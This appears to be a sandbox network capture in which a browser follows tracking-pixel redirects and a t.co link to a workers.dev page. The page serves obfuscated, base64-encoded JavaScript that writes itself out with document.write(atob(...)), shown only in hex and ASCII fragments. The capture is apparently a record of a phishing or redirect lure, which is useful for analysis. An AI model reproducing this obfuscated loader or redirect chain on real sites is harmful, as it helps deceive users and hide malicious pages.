2024-02-09 10:09:36 UTC	1082	OUT	GET /pixel?google_nid=twitter_dbm&google_redir=https://analytics.twitter.com/tpm&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&google_hm=N2RiMDQ0NGQwOTFhMmFmZjQ4ODY1MGQxMWZhZjViYTU0Y2ExM2I1YmY2NDFkNWE2ODJlNmI0Yzk1YmY1YmVkNg== HTTP/1.1 Host: cm.g.doubleclick.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEIucrNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:37 UTC	1220	IN	HTTP/1.1 302 Found P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Location: https://cm.g.doubleclick.net/pixel?google_nid=twitter_dbm&google_redir=https://analytics.twitter.com/tpm&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&google_hm=N2RiMDQ0NGQwOTFhMmFmZjQ4ODY1MGQxMWZhZjViYTU0Y2ExM2I1YmY2NDFkNWE2ODJlNmI0Yzk1YmY1YmVkNg==&google_tc= Date: Fri, 09 Feb 2024 10:09:37 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Cross-Origin-Resource-Policy: cross-origin Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 714 X-XSS-Protection: 0 Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 09-Feb-2024 10:24:37 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-02-09 10:09:37 UTC	32	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f Data Ascii: <HTML><HEAD><meta http-equiv="co
2024-02-09 10:09:37 UTC	682	IN	Data Raw: 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 63 6d 2e 67 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 70 69 78 65 6c 3f 67 6f 6f 67 6c 65 5f 6e 69 64 3d 74 77 69 74 74 65 72 5f 64 62 6d 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 72 65 64 69 72 3d 68 74 74 70 73 3a 2f 2f 61 6e 61 6c 79 74 69 63 73 2e 74 77 69 74 74 65 72 2e 63 6f 6d 2f 74 70 6d 26 61 6d 70 3b 69 64 62 3d 41 41 Data Ascii: ntent-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://cm.g.doubleclick.net/pixel?google_nid=twitter_dbm&google_redir=https://analytics.twitter.com/tpm&idb=AA

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:37 UTC	1133	OUT	GET /pixel?google_nid=twitter_dbm&google_redir=https://analytics.twitter.com/tpm&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&google_hm=N2RiMDQ0NGQwOTFhMmFmZjQ4ODY1MGQxMWZhZjViYTU0Y2ExM2I1YmY2NDFkNWE2ODJlNmI0Yzk1YmY1YmVkNg==&google_tc= HTTP/1.1 Host: cm.g.doubleclick.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEIucrNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: test_cookie=CheckForPermission
2024-02-09 10:09:37 UTC	1211	IN	HTTP/1.1 302 Found P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Location: https://analytics.twitter.com/tpm?idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg Date: Fri, 09 Feb 2024 10:09:37 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Cross-Origin-Resource-Policy: cross-origin Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 517 X-XSS-Protection: 0 Set-Cookie: IDE=AHWqTUm2MPbafmBalieMr8GRYRbdN2iJg9NvK6fBxNBunVNmKCxG4ZY1EjJDwUwjNlQ; expires=Sun, 08-Feb-2026 10:09:37 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none Set-Cookie: test_cookie=; expires=Fri, 01-Aug-2008 22:45:55 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-02-09 10:09:37 UTC	41	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 Data Ascii: <HTML><HEAD><meta http-equiv="content-typ
2024-02-09 10:09:37 UTC	476	IN	Data Raw: 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 61 6e 61 6c 79 74 69 63 73 2e 74 77 69 74 74 65 72 2e 63 6f 6d 2f 74 70 6d 3f 69 64 62 3d 41 41 41 41 45 49 41 46 54 2d 59 41 68 77 4e 44 52 38 43 63 6b 55 53 4d 67 76 39 6e 78 4d 58 6e 75 65 6f 5a 4e 4a 59 34 6e 5a 59 49 79 38 34 65 39 49 6b 48 6a 4e 58 73 4b 51 4f 51 31 45 75 65 35 4f 78 7a 30 77 44 58 56 50 34 74 36 61 45 4f 59 67 51 74 5a 6b 74 6c 50 35 Data Ascii: e" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://analytics.twitter.com/tpm?idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:37 UTC	877	OUT	GET /tpm?idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg HTTP/1.1 Host: analytics.twitter.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: guest_id=v1%3A170747337641474796
2024-02-09 10:09:37 UTC	529	IN	HTTP/1.1 200 OK date: Fri, 09 Feb 2024 10:09:37 GMT perf: 7469935968 server: tsa_b content-type: application/javascript;charset=utf-8 cache-control: no-cache, no-store, max-age=0 x-transaction: f4149782c8ddc352 content-length: 25 x-frame-options: SAMEORIGIN x-transaction-id: f4149782c8ddc352 x-xss-protection: 0 x-content-type-options: nosniff strict-transport-security: max-age=631138519 x-response-time: 5 x-connection-hash: 2f17313e27d47c2d01d4a2d2a3d6f6a8d9a56aad6d4588024946eed3c1d96b9d connection: close
2024-02-09 10:09:37 UTC	25	IN	Data Raw: 70 61 72 74 6e 65 72 49 64 53 79 6e 63 43 6f 6d 70 6c 65 74 65 28 7b 7d 29 Data Ascii: partnerIdSyncComplete({})

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:38 UTC	599	OUT	GET /favicon.ico HTTP/1.1 Host: analytics.twitter.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: guest_id=v1%3A170747337641474796
2024-02-09 10:09:38 UTC	390	IN	HTTP/1.1 200 OK date: Fri, 09 Feb 2024 10:09:38 UTC perf: 7469935968 server: tsa_b content-type: image/x-icon cache-control: no-cache, no-store, max-age=0 content-length: 675 x-transaction-id: 0ca617819a53a386 strict-transport-security: max-age=631138519 x-response-time: 2 x-connection-hash: 0f1f69f791da1dc32141badc897dc2b35e009abab2efc41670712a68ea68f5b6 connection: close
2024-02-09 10:09:38 UTC	675	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 02 6a 49 44 41 54 78 01 ed 57 bd 2f 6c 51 10 ff 79 ef 25 6f 8b 97 bc 7d 95 17 0a 2a 85 42 6c 41 28 24 9a 2d 24 24 24 0a 09 85 84 42 a2 f0 d5 69 ac 4e 87 3f c0 47 47 21 a1 13 51 88 28 48 14 a2 55 20 0a 41 63 15 12 9b 90 6b 66 27 63 af 7b cf bd 7b ce 22 db f8 25 87 dd b9 73 ee 99 33 bf f9 da 0a 00 1e ca 88 1f 28 33 be 0d f8 15 14 6c f6 02 dd 75 66 e5 9e 0d 60 eb 0c 4e 38 19 02 1a 2b a3 f7 56 20 10 84 c9 84 6c 4a fe 06 16 8f 0b f2 b1 66 d1 4c 2d 03 97 59 58 61 3e 0d 8c 37 01 b3 07 40 e6 20 5a cf 0b ae f6 1a 78 de 34 3c da fc 26 1b 6c 10 d9 de 40 58 df b4 66 da 44 3f d3 56 54 d7 fc 60 21 2d 2f 20 f7 bd c9 56 3b c3 86 99 16 79 2b af 47 74 da 18 6b 7e 40 54 Data Ascii: PNGIHDR szzjIDATxW/lQy%o}*BlA($-$$$BiN?GG!Q(HU Ackf'c{{"%s3(3luf`N8+V lJfL-YXa>7@ Zx4<&l@XfD?VT`!-/ V;y+Gtk~@T

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:38 UTC	643	OUT	GET /MnH3QFlxCF HTTP/1.1 Host: t.co Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:38 UTC	607	IN	HTTP/1.1 200 OK date: Fri, 09 Feb 2024 10:09:37 GMT perf: 7469935968 vary: Origin server: tsa_b expires: Fri, 09 Feb 2024 10:14:38 GMT set-cookie: muc=015aa01a-21aa-4747-8a31-f41db2dcb301; Max-Age=34214400; Expires=Tue, 11 Mar 2025 10:09:38 GMT; Domain=t.co; Secure; SameSite=None content-type: text/html; charset=utf-8 cache-control: private,max-age=300 content-length: 414 x-transaction-id: 4a3cab4697521a7f x-xss-protection: 0 strict-transport-security: max-age=0 x-response-time: 14 x-connection-hash: b200757e321fe5e9a488facd577e7604c0aab18568f0218e719b28071f4a2d9d connection: close
2024-02-09 10:09:38 UTC	414	IN	Data Raw: 3c 68 65 61 64 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 68 74 74 70 73 3a 2f 2f 6b 68 61 6e 6d 6f 74 69 6f 7a 70 69 73 78 2e 65 6c 6c 69 65 62 37 2e 77 6f 72 6b 65 72 73 2e 64 65 76 2f 3f 62 62 72 65 3d 43 72 6a 52 51 67 47 42 56 64 45 4d 57 54 79 5a 78 23 2f 6c 64 2d 51 6f 61 68 61 6b 61 62 7a 67 76 7a 6a 78 6e 22 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 6b 68 61 6e 6d 6f 74 69 6f 7a 70 69 73 78 2e 65 6c 6c 69 65 62 37 2e 77 6f 72 6b 65 72 73 2e 64 65 76 2f 3f 62 62 72 65 3d 43 72 6a 52 51 67 47 42 56 64 45 4d 57 54 79 5a 78 23 2f 6c 64 2d 51 6f 61 68 61 6b 61 62 7a 67 76 7a 6a 78 6e 3c 2f 74 69 74 Data Ascii: <head><noscript><META http-equiv="refresh" content="0;URL=https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx#/ld-Qoahakabzgvzjxn"></noscript><title>https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx#/ld-Qoahakabzgvzjxn</tit

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:39 UTC	710	OUT	GET /?bbre=CrjRQgGBVdEMWTyZx HTTP/1.1 Host: khanmotiozpisx.ellieb7.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://t.co/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:39 UTC	571	IN	HTTP/1.1 200 OK Date: Fri, 09 Feb 2024 10:09:39 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 6441 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UT1g2jAA%2BGtt1QPe0fOMcGxgJv6kmhB5Yx3kh61220f6G69Njb0Czb4JwP38zOJGebBYZIg%2FDlBli3nX6dp%2Bm14X2NjnO01oenSApPZqVl21oCGTKNoDkPGNgP%2Fd%2Fbi8KZ2ALjW%2FMMoiMqu8fgADmEb%2BI3NG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 852b516c3d041d7a-ATL alt-svc: h3=":443"; ma=86400
2024-02-09 10:09:39 UTC	798	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 3c 74 69 74 6c 65 3e 26 23 78 34 63 3b 26 23 78 36 66 3b 26 23 78 36 31 3b 26 23 78 36 34 3b 26 23 78 36 39 3b 26 23 78 36 65 3b 26 23 78 36 37 3b 26 23 78 32 30 3b 26 70 65 72 69 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta name="viewport" content="width=device-width initial-scale=1 user-scalable=no maximum-scale=1" /><title>Loading &peri
2024-02-09 10:09:39 UTC	1369	IN	Data Raw: 36 4e 2f 20 6d 49 64 31 48 35 50 4c 70 62 30 58 38 7a 51 74 6a 33 69 34 76 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 68 72 73 7a 38 67 42 62 66 6a 61 46 31 57 44 2f 20 55 6f 74 64 4a 54 70 75 4c 6c 6b 69 32 71 48 6e 4b 59 4f 49 30 43 47 41 46 72 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 4c 55 73 67 57 6e 78 46 7a 38 37 52 47 70 2f 20 4b 49 42 6c 64 56 55 37 66 70 51 35 72 75 6f 31 61 69 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 47 32 68 6c 54 70 34 4a 6b 79 48 64 30 33 31 41 77 42 Data Ascii: 6N/ mId1H5PLpb0X8zQtj3i4v" /><meta property="og:description" content="/hrsz8gBbfjaF1WD/ UotdJTpuLlki2qHnKYOI0CGAFr" /><meta property="twitter:description" content="/LUsgWnxFz87RGp/ KIBldVU7fpQ5ruo1ai" /><meta property="og:url" content="/G2hlTp4JkyHd031AwB
2024-02-09 10:09:39 UTC	1369	IN	Data Raw: 43 4a 70 61 48 4a 50 51 58 68 74 53 57 74 7a 52 30 64 72 63 54 30 39 49 69 77 69 51 30 31 32 4d 45 52 34 61 6c 56 70 59 30 68 4e 52 48 63 30 50 53 49 73 49 6b 4d 7a 61 6b 6f 69 4c 43 4a 44 4d 6d 35 5a 51 58 68 69 4d 43 49 73 49 6b 46 6e 64 6b 68 36 59 54 30 39 49 69 77 69 51 57 68 71 54 48 70 48 50 54 30 69 4c 43 4a 45 5a 7a 6c 30 52 47 68 71 55 45 4a 4e 51 7a 30 69 4c 43 4a 36 4d 6b 52 4d 51 30 63 39 50 53 49 73 49 6b 56 6a 62 56 5a 43 5a 33 46 55 49 69 77 69 65 54 49 35 56 55 4d 7a 63 6c 6c 45 64 32 34 77 51 6a 4e 70 50 53 49 73 49 6b 46 33 4e 56 64 45 65 48 45 39 49 69 77 69 51 6d 64 32 56 58 6f 7a 63 6b 38 69 4c 43 4a 74 4d 6d 6b 31 65 6b 70 69 54 58 70 6a 4e 56 46 44 56 7a 30 39 49 69 77 69 65 54 49 35 56 55 4d 79 4f 56 4e 36 63 54 30 39 49 69 77 69 Data Ascii: CJpaHJPQXhtSWtzR0drcT09IiwiQ012MER4alVpY0hNRHc0PSIsIkMzakoiLCJDMm5ZQXhiMCIsIkFndkh6YT09IiwiQWhqTHpHPT0iLCJEZzl0RGhqUEJNQz0iLCJ6MkRMQ0c9PSIsIkVjbVZCZ3FUIiwieTI5VUMzcllEd24wQjNpPSIsIkF3NVdEeHE9IiwiQmd2VXozck8iLCJtMmk1ekpiTXpjNVFDVz09IiwieTI5VUMyOVN6cT09Iiwi
2024-02-09 10:09:39 UTC	1369	IN	Data Raw: 5a 68 4c 6b 4a 74 57 57 6c 34 62 7a 30 68 4d 43 6b 37 64 6d 46 79 49 48 49 39 5a 6d 45 75 63 45 4e 4a 55 46 4a 30 57 32 46 64 4f 33 4a 6c 64 48 56 79 62 69 42 32 62 32 6c 6b 49 44 41 39 50 54 31 79 50 79 68 75 50 57 5a 68 4c 6b 56 50 61 46 5a 35 56 79 68 75 4b 53 78 6d 59 53 35 77 51 30 6c 51 55 6e 52 62 59 56 30 39 62 69 6b 36 62 6a 31 79 4c 47 35 39 4c 47 46 76 50 57 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6c 37 64 6d 46 79 49 48 49 39 49 54 41 37 63 6d 56 30 64 58 4a 75 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 59 73 62 69 6c 37 64 6d 46 79 49 47 45 39 63 6a 39 6d 64 57 35 6a 64 47 6c 76 62 69 67 70 65 32 6c 6d 4b 47 34 70 65 33 5a 68 63 69 42 68 50 57 35 62 5a 6d 45 6f 49 6a 42 34 59 53 49 70 58 53 68 6d 4c 47 46 79 5a 33 56 74 5a 57 35 30 63 79 6b 37 63 Data Ascii: ZhLkJtWWl4bz0hMCk7dmFyIHI9ZmEucENJUFJ0W2FdO3JldHVybiB2b2lkIDA9PT1yPyhuPWZhLkVPaFZ5VyhuKSxmYS5wQ0lQUnRbYV09bik6bj1yLG59LGFvPWZ1bmN0aW9uKCl7dmFyIHI9ITA7cmV0dXJuIGZ1bmN0aW9uKGYsbil7dmFyIGE9cj9mdW5jdGlvbigpe2lmKG4pe3ZhciBhPW5bZmEoIjB4YSIpXShmLGFyZ3VtZW50cyk7c
2024-02-09 10:09:39 UTC	1369	IN	Data Raw: 69 64 6e 6c 75 62 57 77 39 5a 6d 45 6f 49 6a 42 34 4d 6d 45 69 4b 53 74 6d 59 53 67 69 4d 48 67 79 4e 53 49 70 4b 32 5a 68 4b 43 49 77 65 44 4d 77 49 69 6b 72 5a 6d 45 6f 49 6a 42 34 4d 69 49 70 4b 32 5a 68 4b 43 49 77 65 44 63 69 4b 54 73 74 4d 54 30 39 64 32 6c 75 5a 47 39 33 4c 6d 78 76 59 32 46 30 61 57 39 75 57 32 5a 68 4b 43 49 77 65 44 45 30 49 69 6c 64 57 32 5a 68 4b 43 49 77 65 47 55 69 4b 56 30 6f 5a 6d 45 6f 49 6a 42 34 4e 69 49 70 4b 53 59 6d 4b 48 64 70 62 6d 52 76 64 31 74 6d 59 53 67 69 4d 48 67 79 4d 43 49 70 58 56 74 6d 59 53 67 69 4d 48 67 78 4e 43 49 70 58 54 31 6b 62 32 4e 31 62 57 56 75 64 46 74 6d 59 53 67 69 4d 48 67 79 4d 43 49 70 58 53 35 77 59 58 52 6f 62 6d 46 74 5a 53 73 6f 5a 6d 45 6f 49 6a 42 34 59 79 49 70 4b 32 5a 68 4b 43 Data Ascii: idnlubWw9ZmEoIjB4MmEiKStmYSgiMHgyNSIpK2ZhKCIweDMwIikrZmEoIjB4MiIpK2ZhKCIweDciKTstMT09d2luZG93LmxvY2F0aW9uW2ZhKCIweDE0IildW2ZhKCIweGUiKV0oZmEoIjB4NiIpKSYmKHdpbmRvd1tmYSgiMHgyMCIpXVtmYSgiMHgxNCIpXT1kb2N1bWVudFtmYSgiMHgyMCIpXS5wYXRobmFtZSsoZmEoIjB4YyIpK2ZhKC
2024-02-09 10:09:39 UTC	167	IN	Data Raw: 79 75 71 6e 67 74 7a 72 65 4a 69 41 46 50 66 54 45 61 53 6d 44 73 55 63 22 29 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 4f 65 48 63 42 66 4d 72 54 4a 6e 76 7a 4e 22 29 3b 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 61 74 6f 62 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 58 79 75 71 6e 67 74 7a 72 65 4a 69 41 46 50 66 54 45 61 53 6d 44 73 55 63 22 29 2e 74 65 78 74 43 6f 6e 74 65 6e 74 29 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: yuqngtzreJiAFPfTEaSmDsUc").getAttribute("OeHcBfMrTJnvzN");document.write(atob(document.getElementById("XyuqngtzreJiAFPfTEaSmDsUc").textContent))</script></body></html>

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:39 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
